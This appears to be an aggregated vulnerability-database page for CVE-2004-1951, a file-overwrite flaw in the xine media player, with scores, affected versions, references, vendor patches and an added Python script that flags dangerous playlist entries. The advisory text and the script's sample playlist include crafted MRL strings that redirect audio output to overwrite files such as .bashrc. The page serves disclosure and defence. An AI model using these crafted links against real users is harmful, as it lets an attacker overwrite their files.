CVE-2004-1951
CVSS 5.0
Published: 2004-12-31 00:00:00
Last revised: 2008-09-05 16:42:47

[Original] xine 1.x alpha, 1.x beta, and 1.0rc through 1.0rc3a, and xine-ui 0.9.21 to 0.9.23 allows remote attackers to overwrite arbitrary files via the (1) audio.sun_audio_device or (2) dxr3.devicename options in an MRL link.


[CNNVD] Multiple remote file overwrite vulnerabilities in Xine and Xine-Lib (CNNVD-200412-737)

        
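        Xine is a program for playing VCDs/DVDs on Linux.
        The xine-lib media player mishandles malicious MRLs: a remote attacker can exploit this vulnerability to overwrite arbitrary files on the system with arbitrary content, with the privileges of the application process.
        MRLs (media resource locators) are the URIs that the xine-lib library uses to describe the location of the content to be played. MRLs also offer several features for supplying xine configuration options, which are applied before playback. However, some xine configuration options name a file that is written to during playback. For example, "audio.sun_audio_device" specifies the audio device on Sun machines, and the decoded PCM samples of the audio stream are written to this file. By getting a user to open an MRL such as the following:
        " http://myserver/mybashrc#audio.sun_audio_device:.bashrc "
        which changes the value of the "audio.sun_audio_device" option, and then playing a specially crafted audio stream, an attacker can overwrite system files, resulting in a denial of service.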
        

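- CVSS (base score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: NONE [no impact on system confidentiality]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: NONE [no impact on system availability]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]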

- CPE (affected platforms and products)

cpe:/a:xine:xine-lib:1_rc3c
cpe:/a:xine:xine:1_rc3b
cpe:/a:xine:xine:1_rc0a
cpe:/a:xine:xine:1_beta6
cpe:/a:xine:xine-ui:0.9.22
cpe:/a:xine:xine:1_beta12
cpe:/a:xine:xine:1_rc3a
cpe:/a:xine:xine-lib:1_rc3a
cpe:/a:xine:xine:0.9.13
cpe:/a:xine:xine:1_rc3
cpe:/a:xine:xine:1_beta2
cpe:/a:xine:xine:1_beta9
cpe:/a:xine:xine:1_beta8
cpe:/a:xine:xine:1_rc2
cpe:/a:xine:xine-ui:0.9.23
cpe:/a:xine:xine:1_beta11
cpe:/a:xine:xine-lib:1_rc2
cpe:/a:xine:xine:1_beta3
cpe:/a:xine:xine:1_beta7
cpe:/a:xine:xine:1_rc1
cpe:/a:xine:xine:1_beta5
cpe:/a:xine:xine:1_beta4
cpe:/a:xine:xine:0.9.8
cpe:/a:xine:xine-ui:0.9.21
cpe:/a:xine:xine:1_beta1
cpe:/a:xine:xine:1_beta10
cpe:/a:xine:xine-lib:1_rc3b

- OVAL (technical details for detection)

No related OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1951
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1951
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-737
(Official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/10193
(PATCH)  BID  10193
http://security.gentoo.org/glsa/glsa-200404-20.xml
(PATCH)  GENTOO  GLSA-200404-20
http://xforce.iss.net/xforce/xfdb/15939
(UNKNOWN)  XF  xine-mrl-file-overwrite(15939)
http://www.xinehq.de/index.php/security/XSA-2004-2
(VENDOR_ADVISORY)  CONFIRM  http://www.xinehq.de/index.php/security/XSA-2004-2
http://www.xinehq.de/index.php/security/XSA-2004-1
(VENDOR_ADVISORY)  CONFIRM  http://www.xinehq.de/index.php/security/XSA-2004-1
http://www.slackware.com/security/viewer.php?l=slackware-security&y=2004&m=slackware-security.372791
(UNKNOWN)  SLACKWARE  SSA:2004-111
http://secunia.com/advisories/11433
(UNKNOWN)  SECUNIA  11433
http://www.osvdb.org/5739
(UNKNOWN)  OSVDB  5739
http://www.osvdb.org/5594
(UNKNOWN)  OSVDB  5594

- Vulnerability information

Multiple remote file overwrite vulnerabilities in Xine and Xine-Lib
Medium severity  Design error
2004-12-31 00:00:00 2005-10-20 00:00:00
Remote
        
        

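- Advisories and patches

        Vendor patches:
        Slackware
        ---------
        The vendor has released upgrade patches that fix this security issue; download them from the vendor's site: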
        Slackware Upgrade xine-lib-1rc3c-i686-2.tgz
        ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/xine-lib-1rc3c-i686-2.tgz
        Slackware Upgrade xine-ui-0.99.1-i686-1.tgz
        ftp://ftp.slackware.com/pub/slackware/slackware-9.1/patches/packages/xine-ui-0.99.1-i686-1.tgz
        Slackware Upgrade xine-ui-0.99.1-i686-1.tgz
        ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/xine-ui-0.99.1-i686-1.tgz

- Vulnerability information (24038)

Xine 0.9.x And Xine-Lib 1 Multiple Remote File Overwrite Vulnerabilities (EDBID:24038)
linux remote
2004-04-22 Verified
0 Anonymous
N/A
source: http://www.securityfocus.com/bid/10193/info

It has been reported that the xine media player and the xine media library are affected by multiple remote file overwrite vulnerabilities. This is due to a design error that allows various media resource file configurations to write to arbitrary files.

It is possible to set these configuration parameters to write to arbitrary files on the affected system. It should be noted that this issue, as it is currently known, only affects Sun-based systems as well as those using the DXR3 or Hollywood+ MPEG decoder audio card. It has been conjectured, however, that similar configuration parameters exist that affect other systems.

The configuration syntax:

"cfg:/audio.sun_audio_device:targetFile" 

If followed by the entry:

"http://www.example.com/attackerSpecifiedFile"

Will cause the attacker specified file to be written to the target file.		
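
A playlist audit for the two entry forms quoted above, as an added example that is not part of the original advisory or of xine's own code. It assumes a config assignment looks like `dotted.key:value`, either after `cfg:/` or in the `#` part of an MRL (with `;` between multiple options); the sample playlist is constructed, and `video.driver` is a hypothetical option name.

```python
import re

# File-valued options named in CVE-2004-1951 (taken from the advisory text).
FILE_OPTIONS = {"audio.sun_audio_device", "dxr3.devicename"}

# Assumed shape of a config assignment: dotted key, colon, value.
ASSIGN = re.compile(r"^([A-Za-z0-9_]+(?:\.[A-Za-z0-9_]+)+):(.*)$")


def config_assignments(mrl):
    """Return the (key, value) pairs an MRL or playlist entry tries to set."""
    mrl = mrl.strip().strip('"').strip()
    if mrl.startswith("cfg:/"):
        candidates = [mrl[len("cfg:/"):]]
    else:
        _, sep, fragment = mrl.partition("#")
        candidates = fragment.split(";") if sep else []
    found = []
    for item in candidates:
        match = ASSIGN.match(item)
        if match:
            found.append((match.group(1), match.group(2)))
    return found


def audit_playlist(lines):
    """Flag entries that change configuration before playback.

    'block'  -> sets one of the file-valued options from the advisory
    'review' -> sets some other option (the advisory conjectures that
                similar parameters may exist on other systems)
    """
    findings = []
    for number, line in enumerate(lines, 1):
        for key, value in config_assignments(line):
            severity = "block" if key in FILE_OPTIONS else "review"
            findings.append((number, severity, key, value))
    return findings


# Constructed sample playlist built from the strings quoted on this page.
SAMPLE = [
    "http://www.example.com/song.ogg",
    '"cfg:/audio.sun_audio_device:targetFile"',
    '"http://www.example.com/attackerSpecifiedFile"',
    '" http://myserver/mybashrc#audio.sun_audio_device:.bashrc "',
    "http://www.example.com/clip.mpg#video.driver:xv",
]

if __name__ == "__main__":
    for finding in audit_playlist(SAMPLE):
        print(finding)
```

Entries marked `block` should be dropped before the playlist reaches an unpatched player; upgrading remains the fix given in the solution section.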

- Vulnerability information

5594
xine-lib Playlists MRL Arbitrary File Modification
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Unknown Vendor Verified

- Vulnerability description

xine-lib contains a flaw that may allow a remote attacker to overwrite arbitrary files. The problem is that playlists can alter options in the configuration file. If an attacker creates a specially crafted MRL link, they could overwrite arbitrary files on the system, if a person clicks on the link and plays the malicious audio stream.

- Timeline

2004-04-22 Unknown
Unknown Unknown

- Solution

Upgrade to version 1-rc3b or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- Related references

- Vulnerability author

Unknown or Incomplete
 

 
